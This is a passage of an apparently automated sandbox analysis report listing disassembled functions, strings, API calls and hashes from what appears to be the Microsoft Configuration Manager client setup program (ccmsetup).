                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread$CloseH_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CcmInstallingProduct$SetInstallingFlag$Software\Microsoft\CCMSetup$regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_Ccmsetup, ulAccess)$regKey.SetDword(c_szRegValue_Installing, bInstalling ? 1 : 0)$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 1757837785-1686365800
                                                                                          • Opcode ID: 628d09ea61b6d063bc65a20199e75ad46139b189b2a7b76b39441f040431d0c5
                                                                                          • Instruction ID: 597a791255d1f535a25b2cbf33fcc6f2df97c9a54509138b5ad8750179cc38b3
                                                                                          • Opcode Fuzzy Hash: 628d09ea61b6d063bc65a20199e75ad46139b189b2a7b76b39441f040431d0c5
                                                                                          • Instruction Fuzzy Hash: 7E21F521D8024EE6EB11E7E08C1EBEE6EA6BF51720F148055B540B72C2CBE55A04D361
                                                                                          Function 005AC3F5 Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 168threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005AC3FF
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AC62D
                                                                                            • Part of subcall function 005AB8A2: __EH_prolog3_catch_GS.LIBCMT ref: 005AB8AC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AC55F
                                                                                          Strings
                                                                                          • msiutil.cpp, xrefs: 005AC635
                                                                                          • GetCurrentClientProductCode, xrefs: 005AC448
                                                                                          • msiutil.cpp, xrefs: 005AC54F
                                                                                          • Product version for product '%s' does not exist. Treat as not installed., xrefs: 005AC510
                                                                                          • {252DA259-82CA-4177-B8D0-49C78937BA3E}, xrefs: 005AC48C
                                                                                          • msiutil.cpp, xrefs: 005AC61D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005AC628
                                                                                          • msiutil.cpp, xrefs: 005AC56B
                                                                                          • uMaxVersion > 0, xrefs: 005AC623
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005AC55A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catch_Thread$H_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$GetCurrentClientProductCode$Product version for product '%s' does not exist. Treat as not installed.$msiutil.cpp$msiutil.cpp$msiutil.cpp$msiutil.cpp$uMaxVersion > 0${252DA259-82CA-4177-B8D0-49C78937BA3E}
                                                                                          • API String ID: 1234445865-4009815606
                                                                                          • Opcode ID: 415ae3f3b246a006cc67a5d351c2b320441670084f81c74e43c696e1709b8307
                                                                                          • Instruction ID: 22b10fa28fa3764b84ce94e1447c86763c5519306dd3d973d288a30ff07b06d3
                                                                                          • Opcode Fuzzy Hash: 415ae3f3b246a006cc67a5d351c2b320441670084f81c74e43c696e1709b8307
                                                                                          • Instruction Fuzzy Hash: 05618171D00359EADF20DBA4CD49FEDBEB9BB56300F14419AB109A7282DB705E84CF61
                                                                                          Function 0062C343 Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 122threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0062C34A
                                                                                            • Part of subcall function 006092DC: __EH_prolog3.LIBCMT ref: 006092E3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062C3A4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062C459
                                                                                          Strings
                                                                                          • ..\CcmWebProxyUtilLib.cpp, xrefs: 0062C3AC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062C39F
                                                                                          • CcmUtilLib::CcmSetProxyInfoToBITSJob, xrefs: 0062C35F
                                                                                          • Failed to set proxy to bits job. Error 0x%x, xrefs: 0062C4C6
                                                                                          • pJob, xrefs: 0062C39A
                                                                                          • ..\CcmWebProxyUtilLib.cpp, xrefs: 0062C461
                                                                                          • SetProxyInfoToBITSJob( CCM_PROXY_TYPE_DETECT, 0, BString(sProxyList.c_str()), BString(sBypassList.c_str()), bsEmpty, bsEmpty, pJob, xrefs: 0062C44F
                                                                                          • ..\CcmWebProxyUtilLib.cpp, xrefs: 0062C449
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062C454
                                                                                          • ..\CcmWebProxyUtilLib.cpp, xrefs: 0062C394
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmWebProxyUtilLib.cpp$..\CcmWebProxyUtilLib.cpp$..\CcmWebProxyUtilLib.cpp$..\CcmWebProxyUtilLib.cpp$CcmUtilLib::CcmSetProxyInfoToBITSJob$Failed to set proxy to bits job. Error 0x%x$SetProxyInfoToBITSJob( CCM_PROXY_TYPE_DETECT, 0, BString(sProxyList.c_str()), BString(sBypassList.c_str()), bsEmpty, bsEmpty, pJob$pJob
                                                                                          • API String ID: 981364226-529220274
                                                                                          • Opcode ID: 3f136dbeaf5deb05f7b2e3a6a05761f5b23461b5327730a11dacae55d3486bed
                                                                                          • Instruction ID: 7454e851704f06e82790e446646fd2831edb62fcf6ad060389043a1d2ed5fc47
                                                                                          • Opcode Fuzzy Hash: 3f136dbeaf5deb05f7b2e3a6a05761f5b23461b5327730a11dacae55d3486bed
                                                                                          • Instruction Fuzzy Hash: DE411771941658EADB01EBA4D91ABEF7FB6AF52324F148059F4016B3C2C7745F08CBA1
                                                                                          Function 0062A14B Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 117threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0062A152
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062A1BB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062A293
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$CcmUtilLib::CcmAppendDPAuthTokenToHeaders$SCCM-DPAuth-Token: $ppszNewHeaders$sHeaders.CoAllocString(ppszNewHeaders)
                                                                                          • API String ID: 3353525418-559953918
                                                                                          • Opcode ID: 249f6ae64c26a3ac658cf9148f48abfb692751a4ee1035057948a280fee0ed34
                                                                                          • Instruction ID: 0e3f1a5e65d4ca3edac8ea4c1921b49923bdc2271e8acabf52583817b6c044e3
                                                                                          • Opcode Fuzzy Hash: 249f6ae64c26a3ac658cf9148f48abfb692751a4ee1035057948a280fee0ed34
                                                                                          • Instruction Fuzzy Hash: AD41D371941259EBCF14EFA4E94AAEE7E36AF51710F18811AF611773C1DBB81A04CB22
                                                                                          Function 005EC14B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 105threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$Current$ErrorH_prolog3_catchLastOpenRevertSelfToken
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CCM::Utility::CImpersonator::ImpersonateProcess$CImpersonator::ImpersonateProcess failed with error 0x%x$HRESULT_FROM_WIN32(GetLastError())$X:\bt\1024777\repo\src\common\inc\ccmutil.h$m_bImpersonated == false
                                                                                          • API String ID: 1740939202-2862243018
                                                                                          • Opcode ID: 6e6ca9e3b6e4e2d7cae81a1aff671bfdd918c35551c26e16ec66231c315beb56
                                                                                          • Instruction ID: 151a1626ca3c13de6a1d113cc8d97aadee41f3cf99fad5b584d45305b656cd1f
                                                                                          • Opcode Fuzzy Hash: 6e6ca9e3b6e4e2d7cae81a1aff671bfdd918c35551c26e16ec66231c315beb56
                                                                                          • Instruction Fuzzy Hash: 43312F71A813D6AADB24ABF64D0EBAE7D557F92710F044105FAC0AB2C1C7758642D3A1
                                                                                          Function 0060D017 Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 101threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0060D021
                                                                                            • Part of subcall function 006092DC: __EH_prolog3.LIBCMT ref: 006092E3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060D084
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060D117
                                                                                          Strings
                                                                                          • pvDateTime != 0, xrefs: 0060D07A
                                                                                          • ..\WmiObject.cpp, xrefs: 0060D107
                                                                                          • %04u%02u%02u%02u%02u%02u.%03u000+000, xrefs: 0060D0D4
                                                                                          • ..\WmiObject.cpp, xrefs: 0060D120
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060D112
                                                                                          • StringCchPrintfW( szWmiTime, (sizeof(szWmiTime)/sizeof(szWmiTime[0])), L"%04u%02u%02u%02u%02u%02u.%03u000+000", SystemTime.wYear, , xrefs: 0060D10D
                                                                                          • ..\WmiObject.cpp, xrefs: 0060D08D
                                                                                          • ..\WmiObject.cpp, xrefs: 0060D074
                                                                                          • CCM::Utility::Wmi::SystemTimeToWmiTime, xrefs: 0060D03F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060D07F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %04u%02u%02u%02u%02u%02u.%03u000+000$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$CCM::Utility::Wmi::SystemTimeToWmiTime$StringCchPrintfW( szWmiTime, (sizeof(szWmiTime)/sizeof(szWmiTime[0])), L"%04u%02u%02u%02u%02u%02u.%03u000+000", SystemTime.wYear, $pvDateTime != 0
                                                                                          • API String ID: 3353525418-1479723257
                                                                                          • Opcode ID: b4910682ce1f870dd2bdce3dc93ca500a821ebe03c76c69fd05c2831f0c88446
                                                                                          • Instruction ID: 155bf15f58e5da2c7ba99891a5f05104bbb9fcf7a9249571970b89b57af22a6d
                                                                                          • Opcode Fuzzy Hash: b4910682ce1f870dd2bdce3dc93ca500a821ebe03c76c69fd05c2831f0c88446
                                                                                          • Instruction Fuzzy Hash: BB3119B1980355F9DB20DBA48C06FFEBBB5AF14711F044185F948A72C1D7B85E45CB62
                                                                                          Function 0060D19D Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 97threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0060D1A4
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060D205
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060D27D
                                                                                          • __CxxThrowException@8.LIBCMT ref: 0060D2EA
                                                                                          Strings
                                                                                          • ..\ServiceControl.cpp, xrefs: 0060D26D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060D278
                                                                                          • Open(dwDesiredAccess, pszMachineName, pszServiceDBName), xrefs: 0060D273
                                                                                          • ..\ServiceControl.cpp, xrefs: 0060D286
                                                                                          • ..\ServiceControl.cpp, xrefs: 0060D1F5
                                                                                          • ..\ServiceControl.cpp, xrefs: 0060D20E
                                                                                          • pszServiceName != 0, xrefs: 0060D1FB
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060D200
                                                                                          • CCM::Utility::CServiceControl::CServiceControl, xrefs: 0060D1C4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Exception@8H_prolog3H_prolog3_catchThrow
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\ServiceControl.cpp$..\ServiceControl.cpp$..\ServiceControl.cpp$..\ServiceControl.cpp$CCM::Utility::CServiceControl::CServiceControl$Open(dwDesiredAccess, pszMachineName, pszServiceDBName)$pszServiceName != 0
                                                                                          • API String ID: 1572326495-1186237415
                                                                                          • Opcode ID: 07b57725211c120707dfd45f28e3365c2b6772b0afe87fae038f7b98c6c4d06b
                                                                                          • Instruction ID: 091831bc7100b810e857a3ec2e22881ebc2aa84be9a2d19e1d7bfc0dc47e7d04
                                                                                          • Opcode Fuzzy Hash: 07b57725211c120707dfd45f28e3365c2b6772b0afe87fae038f7b98c6c4d06b
                                                                                          • Instruction Fuzzy Hash: 653126709C034AEADB10EBE4C90ABEE7E61AF21715F148105FA046B2C2C7F84B05D791
                                                                                          Function 00594300 Relevance: 22.8, APIs: 2, Strings: 11, Instructions: 97threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005F646B: __EH_prolog3_catch_GS.LIBCMT ref: 005F6472
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00594362
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005943CE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$($Will install '%s' upon success.$Xi$arrValues.size() > 1$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$sValue.tokenize(c_szOption_Separator, arrValues)
                                                                                          • API String ID: 229633481-3537426159
                                                                                          • Opcode ID: 6ce472e7498f0599777d995845b4a945020b13af4a08a91f14661821489bc8b4
                                                                                          • Instruction ID: cde5d285143baf83222b68204672df65636fcb4d5e7eccd8cc1c2cdc08a19765
                                                                                          • Opcode Fuzzy Hash: 6ce472e7498f0599777d995845b4a945020b13af4a08a91f14661821489bc8b4
                                                                                          • Instruction Fuzzy Hash: FB413B70909259EADF14EFA4CE8DFAD7FB5AB16304F0400D8E509AB282D7715E88CF61
                                                                                          Function 0059E0DB Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 75threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0059E0E2
                                                                                          • DefWindowProcW.USER32(?,?,?,?,CcmSetup::WndProc,00000010), ref: 0059E125
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059E164
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059E1A6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catchProcWindow
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CcmSetup::WndProc$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$g_pCcmSetup->OnPowerEvent((DWORD)wp, (LPVOID)lp)$g_pCcmSetup->Stop()
                                                                                          • API String ID: 1183066285-1861140306
                                                                                          • Opcode ID: 57b8a195afbe0a3d623c0b86adabfbd8ee6f4b56d03869e7dcd2f79ee785eda7
                                                                                          • Instruction ID: 2c8d5702298a9499fb84bf49cc703831631a0196a6e42c36e68c32b1878a6f75
                                                                                          • Opcode Fuzzy Hash: 57b8a195afbe0a3d623c0b86adabfbd8ee6f4b56d03869e7dcd2f79ee785eda7
                                                                                          • Instruction Fuzzy Hash: 2721F2713C0306BADF11EB648D6BEAE3E66BF91B40F580005F840EB2C2DBB18941E751
                                                                                          Function 00629044 Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 65threadencryptiontimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0062904B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062909B
                                                                                          • CertVerifyTimeValidity.CRYPT32(00000000,?), ref: 006290CA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006290FB
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00629096
                                                                                          • ..\CcmCert.cpp, xrefs: 00629103
                                                                                          • CcmUtilLib::IsCertificateCurrent, xrefs: 00629055
                                                                                          • ..\CcmCert.cpp, xrefs: 006290A3
                                                                                          • ..\CcmCert.cpp, xrefs: 0062908B
                                                                                          • ..\CcmCert.cpp, xrefs: 006290EB
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006290F6
                                                                                          • 0 == ::CertVerifyTimeValidity( 0, pCertContext->pCertInfo ), xrefs: 006290F1
                                                                                          • 0 != pCertContext, xrefs: 00629091
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CertH_prolog3_catchTimeValidityVerify
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$0 != pCertContext$0 == ::CertVerifyTimeValidity( 0, pCertContext->pCertInfo )$CcmUtilLib::IsCertificateCurrent
                                                                                          • API String ID: 2956962226-2901582019
                                                                                          • Opcode ID: 0762227d8b0b40bff5876e8fbdfff45aca0609c0e29cdb1a8e6f255c52fcfc0a
                                                                                          • Instruction ID: e0e1d3ed000f4b906aac8d82eedd1150fca742b432a6a9dbdb7fa32d592eda86
                                                                                          • Opcode Fuzzy Hash: 0762227d8b0b40bff5876e8fbdfff45aca0609c0e29cdb1a8e6f255c52fcfc0a
                                                                                          • Instruction Fuzzy Hash: B4112271A80769B6C711ABA54D1EFEF2D65AF91F20F184015BD446B3C1CBE98900C7A5
                                                                                          Function 005CB333 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 286COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_GS.LIBCMT ref: 005CB33D
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005B745F: __EH_prolog3_catch.LIBCMT ref: 005B7466
                                                                                            • Part of subcall function 005B745F: GetCurrentThreadId.KERNEL32 ref: 005B74E0
                                                                                          Strings
                                                                                          • <UpgradeSchedule Value="%s"/>, xrefs: 005CB4BC
                                                                                          • <SourceLocation Value="%s"/>, xrefs: 005CB535
                                                                                          • <SourceType Value="%s"/>, xrefs: 005CB502
                                                                                          • <Packages>%s</Packages>, xrefs: 005CB49D
